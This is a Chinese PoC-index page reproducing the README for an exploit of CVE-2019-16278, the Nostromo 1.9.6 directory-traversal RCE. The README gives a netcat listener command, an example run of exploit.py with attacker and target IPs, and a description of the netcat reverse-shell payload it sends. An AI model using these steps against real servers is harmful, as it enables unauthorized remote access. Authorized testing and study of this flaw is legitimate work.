POC详情: c2faf57084fd3739c206aa29c08168ebd007f1d5

来源
关联漏洞
标题: nostromo nhttpd 路径遍历漏洞 (CVE-2019-16278)
描述:nostromo nhttpd是一款开源的Web服务器。 nostromo nhttpd 1.9.6及之前版本中的‘http_verify’函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
描述
This repository contains an exploit for CVE-2019-16278 in Nostromo Web Server 1.9.6, allowing remote code execution via a directory traversal vulnerability. The script uses pwntools to establish a reverse shell. For educational and authorized testing use only.
介绍
# CVE-2019-16278-Nostromo-1.9.6-RCE
This repository contains an exploit for CVE-2019-16278 in Nostromo Web Server 1.9.6, allowing remote code execution via a directory traversal vulnerability. The script uses pwntools to establish a reverse shell. For educational and authorized testing use only.

## Requirements

- **Python 3.x**
- **pwntools** library

To install `pwntools`, use:
```bash
pip3 install pwntools
```

## Usage

### Setup

1. **Start a Listener**: On the attacking machine, start a listener on the specified port to receive the reverse shell:
   ```bash
   nc -lvnp <attacker-port>
   ```

2. **Run the Script**: Use the following command to execute the exploit script. Replace the values as needed.

   ```bash
   python3 exploit.py --attacker-ip <attacker-ip> --attacker-port <attacker-port> [-t target-ip] [-p target-port]
   ```

### Example

```bash
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80
```

In this example:
- `--attacker-ip 10.10.14.15` is the IP address of the attacking machine.
- `--attacker-port 4444` is the port on which the attacking machine is listening for the reverse shell.
- `-t 10.10.10.165` specifies the target IP (default is `10.10.10.165`).
- `-p 80` specifies the target port (default is `80`).

### Script Options

| Option            | Description                                          | Default         |
|-------------------|------------------------------------------------------|-----------------|
| `-t, --target`    | IP address of the remote host                        | 10.10.10.165    |
| `-p, --port`      | Port on the remote host to target                    | 80              |
| `--attacker-ip`   | IP address of the attacking machine for the reverse shell | None (required) |
| `--attacker-port` | Port on the attacking machine for the reverse shell  | None (required) |

### Script Flow

1. **Warning Message**: Reminds the user to start a listener on the attacking machine.
2. **Payload Construction**: Builds an HTTP request with the reverse shell command using netcat (`nc`).
3. **Payload Execution**: Sends the payload to the target server and attempts to receive a reverse shell.
4. **Retries**: If the initial attempt fails, the script retries up to 3 times with feedback on each attempt.

### Code Flow Example

If successful, you should receive a reverse shell on your listener with access to the target system.

## Disclaimer

This script is intended for educational purposes and authorized testing only. Unauthorized access to computer systems is illegal. The author and contributors are not responsible for any misuse or damage caused by this tool. Use it responsibly and only on systems you have permission to test.

文件快照

[4.0K] /data/pocs/c2faf57084fd3739c206aa29c08168ebd007f1d5 ├── [2.6K] poc.py ├── [2.7K] README.md └── [ 16] requirements.txt 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。